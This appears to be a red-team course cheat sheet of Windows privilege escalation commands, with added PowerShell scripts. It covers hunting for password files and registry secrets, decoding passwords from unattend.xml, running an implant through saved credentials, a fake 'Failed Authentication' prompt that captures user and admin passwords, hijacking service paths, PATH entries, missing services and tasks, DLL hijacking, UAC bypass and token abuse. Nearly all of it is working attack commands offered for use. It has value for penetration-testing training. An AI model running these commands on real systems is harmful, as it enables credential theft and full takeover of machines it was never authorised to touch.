The document outlines various privilege escalation techniques for Windows systems, including methods to exploit low-hanging passwords, unsecured services, and credential managers. It provides specific commands and scripts for executing these techniques, as well as instructions for reconfiguring services and tasks to gain elevated privileges. Additionally, it covers DLL hijacking and UAC bypass exploits as part of the overall strategy to gain system access.

Uploaded by garvsanwariya60

RED TEAM Operator: Privilege Escalation in Windows - commands:

==============================================================

## CREDENTIALS

+ "Low Hanging Passwords"


---------------------------------------------------------
dir /b /a /s c:\ > c:\rto\c-dirs.txt
type c:\rto\c-dirs.txt | findstr /i passw

+ "The X Files" - Interesting Files


---------------------------------------------------------
type c:\rto\c-dirs.txt | findstr /i ssh
type c:\rto\c-dirs.txt | findstr /i kdbx
type c:\rto\c-dirs.txt | findstr /i vnc

Good targets:
install,
backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf, .config, .ini, .xml, .txt, .gpg,
.pgp, .p12, .der, .csr, .cer, id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git,
.kdbx, .db
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db
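
The answer files in the list above (unattend.xml, sysprep.xml) frequently carry local account passwords. The PowerShell below is an added example, not part of the course material or its scripts: it walks the usual answer-file locations (the paths in $AnswerFilePaths are an assumption), pulls every Password/AdministratorPassword element and decodes the base64 form, which Windows Setup produces by UTF-16LE-encoding the password with the word "Password" appended. The sample document at the end is constructed for the demonstration.

```powershell
# Added example, not part of the course material. Answer files store account
# passwords either in plain text (<PlainText>true</PlainText>) or as base64 of
# the UTF-16LE password with the literal word "Password" appended.

# Assumed: the common answer-file locations left behind by Setup/sysprep
$AnswerFilePaths = @(
    "$env:SystemDrive\unattend.xml",
    "$env:SystemDrive\Windows\Panther\unattend.xml",
    "$env:SystemDrive\Windows\Panther\Unattend\unattend.xml",
    "$env:SystemDrive\Windows\System32\sysprep\sysprep.xml",
    "$env:SystemDrive\Windows\System32\sysprep\unattend.xml"
)

function ConvertFrom-UnattendPassword {
    param([Parameter(Mandatory)][string]$Base64)
    $text = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
    # Setup appends "Password" before encoding; strip it when present
    if ($text.EndsWith('Password')) { $text.Substring(0, $text.Length - 8) } else { $text }
}

function Get-AnswerFilePasswords {
    param([Parameter(Mandatory)][xml]$Document, [string]$Source = '<inline>')
    # The files declare a default namespace, so match elements by local-name()
    $nodes = $Document.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")
    foreach ($node in $nodes) {
        $value = $node.SelectSingleNode("*[local-name()='Value']")
        if ($null -eq $value) { continue }
        $plain = $node.SelectSingleNode("*[local-name()='PlainText']")
        $isPlain = ($null -ne $plain) -and ($plain.InnerText.Trim() -eq 'true')
        $password = if ($isPlain) { $value.InnerText } else { ConvertFrom-UnattendPassword $value.InnerText }
        # AutoLogon/LocalAccount entries carry a sibling Username or Name; AdministratorPassword is implicit
        $user = $node.ParentNode.SelectSingleNode("*[local-name()='Username' or local-name()='Name']")
        $account = if ($node.LocalName -eq 'AdministratorPassword') { 'Administrator' } elseif ($user) { $user.InnerText } else { '?' }
        [pscustomobject]@{ Source = $Source; Element = $node.LocalName; Account = $account; Password = $password }
    }
}

function Find-AnswerFilePasswords {
    param([string[]]$Paths = $AnswerFilePaths)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $p -Raw -ErrorAction Stop } catch { continue }
        Get-AnswerFilePasswords -Document $doc -Source $p
    }
}

# Constructed sample (not taken from any real host), encoded the way Setup does it
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('S3cr3t!' + 'Password'))
[xml]$sample = @"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Password><Value>$encoded</Value><PlainText>false</PlainText></Password>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>Winter2024</Value><PlainText>true</PlainText></AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"@

Get-AnswerFilePasswords -Document $sample | Format-Table -AutoSize   # constructed sample
Find-AnswerFilePasswords | Format-Table -AutoSize                    # real locations on this host
```

Run it as the low-privileged user; the answer-file locations are normally world-readable. Files found elsewhere (for example from the c-dirs.txt search above) can be fed in with -Paths.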

+ "Swimming in Hives" - Registry


---------------------------------------------------------
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\OpenSSH\Agent\Keys"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

+ "A Boss with Creds" - Abusing Credential Manager


---------------------------------------------------------
cmdkey /list
runas /savecred /user:admin cmd.exe
runas /savecred /user:admin c:\rto\lpe\implant\implant.exe
runas /savecred /user:admin "c:\windows\system32\cmd /c dir /b /a /s c:\users\admin > c:\rto\admin.txt"

+ "The King is Naked" - Robbing Credential Manager


---------------------------------------------------------
powershell Import-Module c:\rto\lpe\cms.ps1 ; Enum-Creds

+ "A Thief" - Asking User for Creds


---------------------------------------------------------
prompting the current user for their own password, then for the admin account's (the prompt looks like a normal Windows authentication dialog):

powershell "$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password"

powershell "$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'admin',[Environment]::UserDomainName); $cred.getnetworkcredential().password"

## UNSECURED OBJECTS

+ "Boundless Servant" - Unsecured Service [1]


---------------------------------------------------------
searching for auto-start services with unquoted binary paths outside c:\windows (wmic is deprecated and may be absent on current builds; Get-CimInstance Win32_Service returns the same data):
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

+ "Lonely Vassal"- Unsecured Service [2]


---------------------------------------------------------
c:\rto\tools\si\accesschk.exe -accepteula -wuvc "Everyone" *
c:\rto\tools\si\accesschk.exe -accepteula -wuvc "Users" *
c:\rto\tools\si\accesschk.exe -accepteula -wuvc "Authenticated Users" *

checking sshd service configuration and status:


sc query sshd
sc qc sshd

reconfiguration and exploitation:

sc config sshd binPath= "c:\rto\lpe\implant\implant.exe"


sc start sshd

reverting the changes:


sc stop sshd
sc config sshd binPath= "c:\Program Files\OpenSSH\sshd.exe"

+ "Hornets' Nest"- Unsecured Service [3]


---------------------------------------------------------
c:\RTO\Tools\SI\accesschk.exe -accepteula -kvuqsw hklm\System\CurrentControlSet\services > c:\rto\regs.txt

reconfiguring vulnerable service:


reg query HKLM\SYSTEM\CurrentControlSet\services\IKEEXT
reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d C:\rto\lpe\implant\implantsrv.exe /f

restart the machine or run as admin:


sc stop ikeext
sc start ikeext
reverting the changes:
reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d "%systemroot%\system32\svchost.exe -k netsvcs -p" /f

## EXECUTION FLOW HIJACKING

+ "Folding Papers"- Unsecured File System


---------------------------------------------------------
c:\rto\tools\si\accesschk.exe -accepteula -wus "Users" c:\*.* > c:\rto\fld-usr.txt
c:\rto\tools\si\accesschk.exe -accepteula -wus "Authenticated Users" c:\*.* > c:\rto\fld-authusr.txt
notep

+ "Hi Jack, Show Me THE WAY" - Exploiting PATH


---------------------------------------------------------
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
icacls c:\rto\bin
copy c:\windows\system32\cmd.exe c:\rto\bin\notepad.exe

reverting the changes:


del c:\rto\bin\notepad.exe
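
The "Boundless Servant" (unquoted service paths) and "Folding Papers" / "Hi Jack" (writable folders and PATH) checks above come down to one question: which directories that influence execution flow can the current user write to? The PowerShell below is an added example, not part of the course material or its scripts. It shares one writability probe between the two checks, expands each unquoted service path into the candidate binaries the service control manager would try before the real one, and lists the machine-wide PATH in search order. It assumes it is run as the low-privileged account being assessed.

```powershell
# Added example, not part of the course material. One writability probe shared
# by two checks: (1) auto-start services whose unquoted binary path contains
# spaces, listing every path Windows would try before the real binary, and
# (2) the system PATH entries, in search order.
# Assumed: run as the low-privileged account being assessed.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Creating and deleting a probe file is more reliable than reading ACLs;
    # it is also noisy, so avoid it where file-creation auditing matters
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ('.' + [guid]::NewGuid().ToString('N'))
    try {
        [System.IO.File]::WriteAllText($probe, '')
        [System.IO.File]::Delete($probe)
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePathCandidates {
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and -not $_.PathName.StartsWith('"') } |
        ForEach-Object {
            $svc = $_
            # Keep only the executable: everything up to the first ".exe" (drops service arguments)
            $exe = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
            $parts = $exe -split ' '
            # For C:\Program Files\Some App\svc.exe Windows tries C:\Program.exe,
            # then C:\Program Files\Some.exe, before the intended binary
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Candidate = $candidate
                    Writable  = Test-DirectoryWritable (Split-Path -Parent $candidate)
                }
            }
        }
}

function Get-PathEntries {
    # The machine-wide PATH from the registry (what services and tasks inherit), not this process's copy
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    $raw = (Get-ItemProperty -LiteralPath $key -Name Path).Path
    $order = 0
    foreach ($dir in ([Environment]::ExpandEnvironmentVariables($raw) -split ';')) {
        $dir = $dir.Trim()
        if (-not $dir) { continue }
        $order++
        [pscustomobject]@{ Order = $order; Directory = $dir; Writable = Test-DirectoryWritable $dir }
    }
}

Get-UnquotedServicePathCandidates | Where-Object Writable | Format-Table -AutoSize
Get-PathEntries | Format-Table -AutoSize
```

Which lookup a writable PATH entry wins depends on the caller: cmd.exe and PowerShell resolve bare command names through PATH in order, so an entry before system32 shadows notepad for a batch file or script, whereas CreateProcess and the DLL loader check the application directory and system32 before PATH, so there a writable entry only pays off for names that do not exist in those directories.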

+ "Closed. No Service" - Missing Service


---------------------------------------------------------
c:\RTO\Tools\si\autorunsc64.exe -a s | more
sc query AdobeUpdate
sc qc AdobeUpdate
copy c:\RTO\LPE\implant\implantsrv.exe c:\rto\bin\AdobeUpdate.exe

restart the machine or run as admin:


sc stop AdobeUpdate
sc start AdobeUpdate

reverting the changes:


del c:\rto\bin\AdobeUpdate.exe

+ "Jobless" - Missing Task


---------------------------------------------------------
c:\RTO\Tools\si\autorunsc64.exe -a t | more
schtasks /query /tn OneDriveChk /xml

converting SID to username:


wmic useraccount where sid='S-1-5-21-3461203602-4096304019-2269080069-1003' get name

copy c:\RTO\LPE\implant\implant.exe C:\RTO\bin\OneDriveChk.exe

reverting the changes:


del C:\RTO\bin\OneDriveChk.exe
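
autorunsc lists the entries; the PowerShell below is an added example, not part of the course material or its scripts, that narrows them to the cases behind "Closed. No Service" and "Jobless": services and scheduled tasks whose executable is missing from disk, together with the account each runs as (task principals given as SIDs are translated to names, which is what the wmic useraccount query above does by hand). It assumes Windows 8 / Server 2012 or later for Get-ScheduledTask, and bare command names are resolved against this user's PATH, which may differ from the task's own environment.

```powershell
# Added example, not part of the course material. Lists services and scheduled
# tasks whose executable is missing from disk, with the account they run as,
# and resolves SIDs in task principals to account names.
# Assumed: Windows 8 / Server 2012 or later (Get-ScheduledTask).

function Get-ExecutableFromCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) { return ($cmd -split '"')[1] }   # "C:\dir with spaces\x.exe" args
    if ($cmd -match '^(.*?\.exe)') { return $Matches[1] }      # C:\dir\x.exe args
    return ($cmd -split ' ')[0]                                 # no .exe suffix: first token
}

function Test-ExecutableMissing {
    param([Parameter(Mandatory)][string]$Exe)
    # Bare names (no directory) are resolved through PATH at run time
    if ($Exe -match '[\\/]') { return -not (Test-Path -LiteralPath $Exe -PathType Leaf) }
    return $null -eq (Get-Command -Name $Exe -CommandType Application -ErrorAction SilentlyContinue)
}

function ConvertTo-AccountName {
    param([string]$Id)
    if ($Id -match '^S-1-') {
        try { return ([System.Security.Principal.SecurityIdentifier]$Id).Translate([System.Security.Principal.NTAccount]).Value } catch { }
    }
    return $Id
}

function Get-MissingServiceBinaries {
    Get-CimInstance Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        $exe = Get-ExecutableFromCommandLine $_.PathName
        if (Test-ExecutableMissing $exe) {
            [pscustomobject]@{ Kind = 'Service'; Name = $_.Name; RunsAs = ConvertTo-AccountName $_.StartName; StartMode = $_.StartMode; Missing = $exe }
        }
    }
}

function Get-MissingTaskBinaries {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in @($task.Actions | Where-Object { $_.Execute })) {
            $exe = Get-ExecutableFromCommandLine $action.Execute
            if (Test-ExecutableMissing $exe) {
                [pscustomobject]@{
                    Kind     = 'Task'
                    Name     = $task.TaskPath + $task.TaskName
                    RunsAs   = ConvertTo-AccountName $task.Principal.UserId
                    RunLevel = $task.Principal.RunLevel
                    Missing  = $exe
                }
            }
        }
    }
}

Get-MissingServiceBinaries | Format-Table -AutoSize
Get-MissingTaskBinaries | Format-Table -AutoSize
```

A hit is only useful when the directory the missing binary would be loaded from (or, for a bare name, an earlier PATH entry) is writable; check that with accesschk or icacls as in the sections above before dropping a payload.
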
+ "Library Has Fallen" - DLL Hijacking


---------------------------------------------------------
putty.exe resolves winmm.dll by name and the application directory is searched before system32, so a DLL dropped next to a putty.exe that sits in a user-writable folder runs in putty's context; the DLL must match the bitness of the target process.
compile with 32-bit compiler:
cd c:\RTO\LPE\DLL-hijack
compile.bat
copy c:\RTO\LPE\DLL-hijack\winmm.dll c:\RTO\Tools\putty\

reverting the changes:


del c:\RTO\Tools\putty\winmm.dll

+ "You Ain't Corner Me" - UACME


---------------------------------------------------------
repo with up-to-date UAC bypass exploits:
https://github.com/hfiref0x/UACME

## GETTING SYSTEM

+ "! NeverRemoveDepressed" - AlwaysInstallElevated Hack


---------------------------------------------------------
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

the policy only takes effect when the value is 1 under both HKLM and HKCU; then any .msi the user installs (msiexec /i package.msi) runs its install actions as SYSTEM

+ "Hi, Sis!" - New Service for SYSTEM


---------------------------------------------------------
run from elevated admin cmd/console:
sc create lol binPath= "c:\RTO\LPE\implant\implant.exe"
sc start lol
sc stop lol
sc delete lol

+ "Chip & Dance Show" - Abusing Tokens [2]


---------------------------------------------------------
reg query HKLM\SYSTEM\CurrentControlSet\services\IKEEXT
reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d c:\RTO\LPE\2SYSTEM\TokenDance\tokendance.exe /f

restart the machine or run as admin:


sc stop ikeext
sc start ikeext

reverting the changes:


reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d "%systemroot%\system32\svchost.exe -k netsvcs -p" /f

+ "Broken Calumet Exposed" - Exploiting Named Pipes [2]


---------------------------------------------------------
compile piper in VS command line (as user rto)
cd \RTO\LPE\2SYSTEM\Piper
compile.bat

run from elevated admin cmd/console:


cd \RTO\LPE\2SYSTEM\Piper
piper.exe
